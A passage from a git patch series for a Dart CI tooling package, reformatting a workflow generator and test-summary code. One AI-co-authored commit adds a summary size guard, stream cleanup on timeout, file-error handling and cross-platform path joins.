json:...`. @@ -168,8 +154,7 @@ abstract final class StepSummary { if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); testErrors[id]!.write(event['error'] as String? ?? ''); testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) - testStackTraces[id]!.write('\n---\n'); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); case 'print': @@ -196,9 +181,7 @@ abstract final class StepSummary { final buf = StringBuffer(); final platformId = - Platform.environment['PLATFORM_ID'] ?? - Platform.environment['RUNNER_NAME'] ?? - Platform.operatingSystem; + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? 
Platform.operatingSystem; buf.writeln('## Test Results — ${escapeHtml(platformId)}'); buf.writeln(); @@ -207,9 +190,7 @@ abstract final class StepSummary { final status = exitCode == 0 ? 'passed' : 'failed'; final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; buf.writeln('> [!$icon]'); - buf.writeln( - '> Tests $status (exit code $exitCode) — no structured results available.', - ); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); buf.writeln(); buf.writeln('Check the expanded output in test logs for details.'); buf.writeln(); @@ -247,15 +228,11 @@ abstract final class StepSummary { for (final f in displayFailures) { final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; buf.writeln('
'); - buf.writeln( - ':x: ${escapeHtml(f.name)}$durStr', - ); + buf.writeln(':x: ${escapeHtml(f.name)}$durStr'); buf.writeln(); if (f.error.isNotEmpty) { - final error = f.error.length > 2000 - ? '${f.error.substring(0, 2000)}\n... (truncated)' - : f.error; + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); final fence = _codeFence(error); buf.writeln(fence); @@ -279,9 +256,7 @@ abstract final class StepSummary { if (f.printOutput.isNotEmpty) { final trimmed = f.printOutput.trimRight(); final lineCount = trimmed.split('\n').length; - final printPreview = trimmed.length > 1500 - ? '${trimmed.substring(0, 1500)}\n... (truncated)' - : trimmed; + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); final fence = _codeFence(printPreview); buf.writeln(fence); @@ -295,9 +270,7 @@ abstract final class StepSummary { } if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._', - ); + buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); buf.writeln(); } } diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 26208a3..b86c3de 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -12,11 +12,7 @@ class _PlatformDefinition { final String arch; // x64 | arm64 final String runner; // default `runs-on:` label - const _PlatformDefinition({ - required this.osFamily, - required this.arch, - required this.runner, - }); + const _PlatformDefinition({required this.osFamily, required this.arch, required this.runner}); } /// Maps platform identifiers to their default runner label + metadata. 
@@ -25,16 +21,8 @@ class _PlatformDefinition { /// `ci.runner_overrides: { "": "" }` const _platformDefinitions = { // Linux — org-managed runners - 'ubuntu': _PlatformDefinition( - osFamily: 'linux', - arch: 'x64', - runner: 'runtime-ubuntu-24.04-x64-256gb-64core', - ), - 'ubuntu-x64': _PlatformDefinition( - osFamily: 'linux', - arch: 'x64', - runner: 'runtime-ubuntu-24.04-x64-256gb-64core', - ), + 'ubuntu': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), + 'ubuntu-x64': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), 'ubuntu-arm64': _PlatformDefinition( osFamily: 'linux', arch: 'arm64', @@ -42,33 +30,13 @@ const _platformDefinitions = { ), // macOS — standard GitHub-hosted runners (no org-managed equivalents) - 'macos': _PlatformDefinition( - osFamily: 'macos', - arch: 'arm64', - runner: 'macos-latest', - ), - 'macos-arm64': _PlatformDefinition( - osFamily: 'macos', - arch: 'arm64', - runner: 'macos-latest', - ), - 'macos-x64': _PlatformDefinition( - osFamily: 'macos', - arch: 'x64', - runner: 'macos-15-large', - ), + 'macos': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), + 'macos-arm64': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), + 'macos-x64': _PlatformDefinition(osFamily: 'macos', arch: 'x64', runner: 'macos-15-large'), // Windows — org-managed runners - 'windows': _PlatformDefinition( - osFamily: 'windows', - arch: 'x64', - runner: 'runtime-windows-2025-x64-256gb-64core', - ), - 'windows-x64': _PlatformDefinition( - osFamily: 'windows', - arch: 'x64', - runner: 'runtime-windows-2025-x64-256gb-64core', - ), + 'windows': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), + 'windows-x64': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), 'windows-arm64': _PlatformDefinition( 
osFamily: 'windows', arch: 'arm64', @@ -106,9 +74,7 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); /// Returns the web_test config map if present and valid; otherwise null. - static Map? _getWebTestConfig( - Map ciConfig, - ) { + static Map? _getWebTestConfig(Map ciConfig) { final raw = ciConfig['web_test']; return raw is Map ? raw : null; } @@ -130,9 +96,7 @@ class WorkflowGenerator { final ci = config['ci']; if (ci == null) return null; if (ci is! Map) { - throw StateError( - 'Expected "ci" in $configPath to be an object, got ${ci.runtimeType}', - ); + throw StateError('Expected "ci" in $configPath to be an object, got ${ci.runtimeType}'); } return ci; } @@ -146,14 +110,10 @@ class WorkflowGenerator { String render({String? existingContent}) { final errors = validate(ciConfig); if (errors.isNotEmpty) { - throw StateError( - 'Cannot render with invalid config:\n ${errors.join('\n ')}', - ); + throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); } - final skeletonPath = TemplateResolver.resolveTemplatePath( - 'github/workflows/ci.skeleton.yaml', - ); + final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { throw StateError('CI skeleton template not found at $skeletonPath'); @@ -176,19 +136,14 @@ class WorkflowGenerator { Map _buildContext() { final features = ciConfig['features'] as Map? ?? {}; final secretsRaw = ciConfig['secrets']; - final secrets = secretsRaw is Map - ? secretsRaw - : {}; + final secrets = secretsRaw is Map ? secretsRaw : {}; final subPackages = ciConfig['sub_packages'] as List? ?? 
[]; // Build secrets list for env block (skip non-string values) final secretsList = >[]; for (final entry in secrets.entries) { if (entry.value is String) { - secretsList.add({ - 'env_name': entry.key, - 'secret_name': entry.value as String, - }); + secretsList.add({'env_name': entry.key, 'secret_name': entry.value as String}); } } @@ -204,9 +159,7 @@ class WorkflowGenerator { final isMultiPlatform = platforms.length > 1; final runnerOverridesRaw = ciConfig['runner_overrides']; - final runnerOverrides = runnerOverridesRaw is Map - ? runnerOverridesRaw - : {}; + final runnerOverrides = runnerOverridesRaw is Map ? runnerOverridesRaw : {}; String resolveRunner(String platformId) { final override = runnerOverrides[platformId]; if (override is String && override.trim().isNotEmpty) { @@ -231,8 +184,7 @@ class WorkflowGenerator { 'tooling_version': toolingVersion, 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', 'line_length': '${ciConfig['line_length'] ?? 120}', - 'pat_secret': - ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', + 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags 'proto': features['proto'] == true, @@ -245,14 +197,9 @@ class WorkflowGenerator { 'web_test': features['web_test'] == true, // Web test config (only computed when web_test is true) - 'web_test_concurrency': features['web_test'] == true - ? _resolveWebTestConcurrency(ciConfig) - : '1', - 'web_test_paths': features['web_test'] == true - ? _resolveWebTestPaths(ciConfig) - : '', - 'web_test_has_paths': - features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), + 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', + 'web_test_paths': features['web_test'] == true ? 
_resolveWebTestPaths(ciConfig) : '', + 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -290,11 +237,7 @@ class WorkflowGenerator { if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths - .whereType() - .where((s) => s.trim().isNotEmpty) - .map((s) => p.posix.normalize(s)) - .toList(); + return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); } } return const []; @@ -328,10 +271,7 @@ class WorkflowGenerator { existing = existing.replaceAll('\r\n', '\n'); rendered = rendered.replaceAll('\r\n', '\n'); - final sectionPattern = RegExp( - r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', - dotAll: true, - ); + final sectionPattern = RegExp(r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', dotAll: true); // Extract user content from existing file final userSections = {}; @@ -349,10 +289,8 @@ class WorkflowGenerator { // Replace empty user sections in rendered output with preserved content var result = rendered; for (final entry in userSections.entries) { - final emptyPattern = - '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; - final replacement = - '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; + final emptyPattern = '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; + final replacement = '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; result = result.replaceFirst(emptyPattern, replacement); } @@ -377,15 +315,10 @@ class WorkflowGenerator { errors.add('ci.dart_sdk must not contain newlines/tabs'); } else { // dart-lang/setup-dart accepts semver versions or channels like stable/beta/dev. 
- final isChannel = - trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; - final isSemver = RegExp( - r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$', - ).hasMatch(trimmed); + final isChannel = trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; + final isSemver = RegExp(r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$').hasMatch(trimmed); if (!isChannel && !isSemver) { - errors.add( - 'ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"', - ); + errors.add('ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"'); } } } @@ -399,18 +332,14 @@ class WorkflowGenerator { final key = entry.key; final value = entry.value; if (key is! String) { - errors.add( - 'ci.features keys must be strings, got ${key.runtimeType}', - ); + errors.add('ci.features keys must be strings, got ${key.runtimeType}'); continue; } if (!_knownFeatureKeys.contains(key)) { errors.add('ci.features contains unknown key "$key" (typo?)'); } if (value is! bool) { - errors.add( - 'ci.features["$key"] must be a bool, got ${value.runtimeType}', - ); + errors.add('ci.features["$key"] must be a bool, got ${value.runtimeType}'); } } } @@ -424,16 +353,12 @@ class WorkflowGenerator { } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { - errors.add( - 'ci.line_length must be a number or string, got ${lineLength.runtimeType}', - ); + errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! List) { - errors.add( - 'ci.platforms must be an array, got ${platforms.runtimeType}', - ); + errors.add('ci.platforms must be an array, got ${platforms.runtimeType}'); } else { for (final p in platforms) { if (p is! 
String || !_platformDefinitions.containsKey(p)) { @@ -451,17 +376,13 @@ class WorkflowGenerator { final subPackages = ciConfig['sub_packages']; if (subPackages != null) { if (subPackages is! List) { - errors.add( - 'ci.sub_packages must be an array, got ${subPackages.runtimeType}', - ); + errors.add('ci.sub_packages must be an array, got ${subPackages.runtimeType}'); } else { final seenNames = {}; final seenPaths = {}; for (final sp in subPackages) { if (sp is! Map) { - errors.add( - 'ci.sub_packages entries must be objects, got ${sp.runtimeType}', - ); + errors.add('ci.sub_packages entries must be objects, got ${sp.runtimeType}'); continue; } final name = sp['name']; @@ -482,28 +403,20 @@ class WorkflowGenerator { continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs'); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path'); continue; } if (pathValue.contains('\\')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)'); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo', - ); + errors.add('ci.sub_packages["${name is String ? 
name : '?'}"].path must not traverse outside the repo'); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { @@ -522,9 +435,7 @@ class WorkflowGenerator { final runnerOverrides = ciConfig['runner_overrides']; if (runnerOverrides != null) { if (runnerOverrides is! Map) { - errors.add( - 'ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}', - ); + errors.add('ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}'); } else { for (final entry in runnerOverrides.entries) { final key = entry.key; @@ -537,9 +448,7 @@ class WorkflowGenerator { continue; } if (value is! String || value.trim().isEmpty) { - errors.add( - 'ci.runner_overrides["$key"] must be a non-empty string', - ); + errors.add('ci.runner_overrides["$key"] must be a non-empty string'); } } } @@ -548,9 +457,7 @@ class WorkflowGenerator { final webTestConfig = ciConfig['web_test']; if (webTestConfig != null) { if (webTestConfig is! Map) { - errors.add( - 'ci.web_test must be an object, got ${webTestConfig.runtimeType}', - ); + errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); } else { // Detect unknown keys inside web_test config for (final key in webTestConfig.keys) { @@ -562,22 +469,16 @@ class WorkflowGenerator { final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! int) { - errors.add( - 'ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}', - ); + errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); } else if (concurrency < 1 || concurrency > 32) { - errors.add( - 'ci.web_test.concurrency must be between 1 and 32, got $concurrency', - ); + errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); } } final paths = webTestConfig['paths']; if (paths != null) { if (paths is! 
List) { - errors.add( - 'ci.web_test.paths must be an array, got ${paths.runtimeType}', - ); + errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); } else { final seenPaths = {}; for (var i = 0; i < paths.length; i++) { @@ -587,46 +488,32 @@ class WorkflowGenerator { continue; } if (pathValue != pathValue.trim()) { - errors.add( - 'ci.web_test.paths[$i] must not have leading/trailing whitespace', - ); + errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add( - 'ci.web_test.paths[$i] must not contain newlines/tabs', - ); + errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add( - 'ci.web_test.paths[$i] must be a relative repo path', - ); + errors.add('ci.web_test.paths[$i] must be a relative repo path'); continue; } if (pathValue.contains('\\')) { - errors.add( - 'ci.web_test.paths[$i] must use forward slashes (/)', - ); + errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add( - 'ci.web_test.paths[$i] must not traverse outside the repo', - ); + errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { - errors.add( - 'ci.web_test.paths[$i] contains unsupported characters: "$pathValue"', - ); + errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); continue; } if (!seenPaths.add(normalized)) { - errors.add( - 'ci.web_test.paths contains duplicate path "$normalized"', - ); + errors.add('ci.web_test.paths contains duplicate path "$normalized"'); } } } @@ -640,9 +527,7 @@ class WorkflowGenerator { if (features is Map) { final webTestEnabled = features['web_test'] == true; if (!webTestEnabled && 
webTestConfig is Map && webTestConfig.isNotEmpty) { - errors.add( - 'ci.web_test config is present but ci.features.web_test is not enabled (dead config?)', - ); + errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); } } @@ -661,10 +546,7 @@ class WorkflowGenerator { Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); - final enabledFeatures = features.entries - .where((e) => e.value == true) - .map((e) => e.key) - .toList(); + final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); if (enabledFeatures.isNotEmpty) { Logger.info(' Features: ${enabledFeatures.join(', ')}'); } else { @@ -673,16 +555,10 @@ class WorkflowGenerator { if (features['web_test'] == true) { final wtConfig = ciConfig['web_test']; - final wtMap = wtConfig is Map - ? wtConfig - : {}; - final concurrency = wtMap['concurrency'] is int - ? wtMap['concurrency'] - : 1; + final wtMap = wtConfig is Map ? wtConfig : {}; + final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; final webPaths = wtMap['paths'] is List ? wtMap['paths'] as List : []; - Logger.info( - ' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}', - ); + Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? 
"(all)" : webPaths.join(", ")}'); } if (secrets.isNotEmpty) { From fe79ee43c72d5f75b4ef19c7fa20fa78fdf52be8 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 19:59:36 -0500 Subject: [PATCH 06/16] =?UTF-8?q?fix:=20address=20PR=20review=20findings?= =?UTF-8?q?=20=E2=80=94=20size=20guard,=20stream=20cleanup,=20path=20safet?= =?UTF-8?q?y,=20PLATFORM=5FID?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add cumulative 1 MiB size guard to StepSummary.write() to prevent exceeding GitHub step summary limit - Store stream subscriptions separately and cancel on timeout to prevent resource leaks in TestCommand and _runTest() - Guard logDir creation and log file writes with FileSystemException catch blocks for robustness - Use package:path (p.join) for all path construction in TestCommand for cross-platform safety - Add single-quote escaping to StepSummary.escapeHtml() - HTML-escape collapsible() title parameter - Add PLATFORM_ID env var to multi-platform CI template from matrix.platform_id for meaningful test summary headings - Use $TEST_LOG_DIR consistently in CI template run blocks instead of hardcoded $RUNNER_TEMP/test-logs Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 5 ++- .runtime_ci/template_versions.json | 8 ++-- lib/src/cli/commands/test_command.dart | 48 +++++++++++++-------- lib/src/cli/manage_cicd.dart | 33 +++++++++----- lib/src/cli/utils/step_summary.dart | 23 ++++++++-- templates/github/workflows/ci.skeleton.yaml | 9 ++-- 6 files changed, 85 insertions(+), 41 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 40038b3..ac6ba13 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -190,11 +190,12 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run 
runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs + PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs if: always() diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 4dd8bfe..cb02ab0 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-24T22:08:51.110199Z", + "updated_at": "2026-02-25T00:56:25.768561Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,9 +23,9 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "65637b8a60124f7837b7c7b755ef718312054cac6307cf4cb3d646eccac02e6e", - "consumer_hash": "2b0dc631e68ad35000c358bb982f06a9ef5f7a9988581dcf994095ad47fd524d", - "updated_at": "2026-02-24T22:08:51.111054Z" + "hash": "de1765ea0dff5801a219ba046d25e890155e2ef3cbaa817563125926891aecae", + "consumer_hash": "7e82ac3ccf2e0b584b0797809862cc5c694e5a36923fd78c8565c8bb558eec7b", + "updated_at": "2026-02-25T00:56:25.769334Z" }, "workflow_release": { "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 4103fe7..cbef56a 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -3,6 +3,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; +import 'package:path/path.dart' as p; import '../../triage/utils/config.dart'; import '../utils/logger.dart'; @@ -43,15 +44,20 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? 
'$repoRoot/.dart_tool/test-logs'; - Directory(logDir).createSync(recursive: true); + final logDir = Platform.environment['TEST_LOG_DIR'] ?? p.join(repoRoot, '.dart_tool', 'test-logs'); + try { + Directory(logDir).createSync(recursive: true); + } on FileSystemException catch (e) { + Logger.error('Cannot create log directory $logDir: $e'); + exit(1); + } Logger.info('Log directory: $logDir'); - final jsonPath = '$logDir/results.json'; - final expandedPath = '$logDir/expanded.txt'; + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); // Skip gracefully if no test/ directory exists - final testDir = Directory('$repoRoot/test'); + final testDir = Directory(p.join(repoRoot, 'test')); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); StepSummary.write('## Test Results\n\n**No test/ directory found — skipped.**\n'); @@ -80,15 +86,17 @@ class TestCommand extends Command { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); - }).asFuture(); - - final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + }); + final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); - }).asFuture(); + }); + + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. final exitCode = await process.exitCode.timeout( @@ -103,13 +111,19 @@ class TestCommand extends Command { try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Ignore stream errors (e.g. 
process killed before streams drained) + // Process killed or streams timed out — cancel subscriptions to avoid leaks + await stdoutSub.cancel(); + await stderrSub.cancel(); } // Write console output to log files - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + try { + File(p.join(logDir, 'dart_stdout.log')).writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File(p.join(logDir, 'dart_stderr.log')).writeAsStringSync(stderrBuf.toString()); + } + } on FileSystemException catch (e) { + Logger.warn('Could not write log files: $e'); } // Parse the JSON results file for structured test data @@ -133,7 +147,7 @@ class TestCommand extends Command { for (final sp in subPackages) { final name = sp['name'] as String; final path = sp['path'] as String; - final dir = '$repoRoot/$path'; + final dir = p.join(repoRoot, path); Logger.header('Testing sub-package: $name ($path)'); @@ -142,14 +156,14 @@ class TestCommand extends Command { continue; } - if (!File('$dir/pubspec.yaml').existsSync()) { + if (!File(p.join(dir, 'pubspec.yaml')).existsSync()) { Logger.error(' No pubspec.yaml in $dir — cannot test'); failures.add(name); continue; } // Skip sub-packages with no test/ directory - final spTestDir = Directory('$dir/test'); + final spTestDir = Directory(p.join(dir, 'test')); if (!spTestDir.existsSync()) { Logger.info(' No test/ directory in $name — skipping'); continue; diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 2dd1ade..5534b67 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2165,7 +2165,12 @@ Future _runTest(String repoRoot) async { // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) final logDir = Platform.environment['TEST_LOG_DIR'] ?? 
'$repoRoot/.dart_tool/test-logs'; - Directory(logDir).createSync(recursive: true); + try { + Directory(logDir).createSync(recursive: true); + } on FileSystemException catch (e) { + _error('Cannot create log directory $logDir: $e'); + exit(1); + } final jsonPath = '$logDir/results.json'; final expandedPath = '$logDir/expanded.txt'; @@ -2195,15 +2200,17 @@ Future _runTest(String repoRoot) async { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); - }).asFuture(); - - final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + }); + final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); - }).asFuture(); + }); + + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); // Wait for process to exit (45-min safety timeout) const processTimeout = Duration(minutes: 45); @@ -2218,16 +2225,22 @@ Future _runTest(String repoRoot) async { try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Ignore stream errors (e.g. 
process killed before streams drained) + // Process killed or streams timed out — cancel subscriptions to avoid leaks + await stdoutSub.cancel(); + await stderrSub.cancel(); } // Parse the JSON results file for structured test data final results = StepSummary.parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + try { + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + } on FileSystemException catch (e) { + _warn('Could not write log files: $e'); } // Generate and write the rich job summary diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 8af587f..0208207 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -33,13 +33,22 @@ class TestResults { /// Step summary utilities for GitHub Actions. abstract final class StepSummary { + /// Maximum safe size for $GITHUB_STEP_SUMMARY (1 MiB minus 4 KiB buffer). + static const int _maxSummaryBytes = (1024 * 1024) - (4 * 1024); + /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). + /// Skips appending if the file would exceed the 1 MiB GitHub limit. static void write(String markdown) { final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); + if (summaryFile == null) return; + final file = File(summaryFile); + final currentSize = file.existsSync() ? 
file.lengthSync() : 0; + if (currentSize + markdown.length > _maxSummaryBytes) { + Logger.warn('Step summary approaching 1 MiB limit — skipping append'); + return; } + file.writeAsStringSync(markdown, mode: FileMode.append); } /// Build a link to the current workflow run's artifacts page. @@ -78,12 +87,18 @@ abstract final class StepSummary { static String collapsible(String title, String content, {bool open = false}) { if (content.trim().isEmpty) return ''; final openAttr = open ? ' open' : ''; - return '\n\n$title\n\n$content\n\n
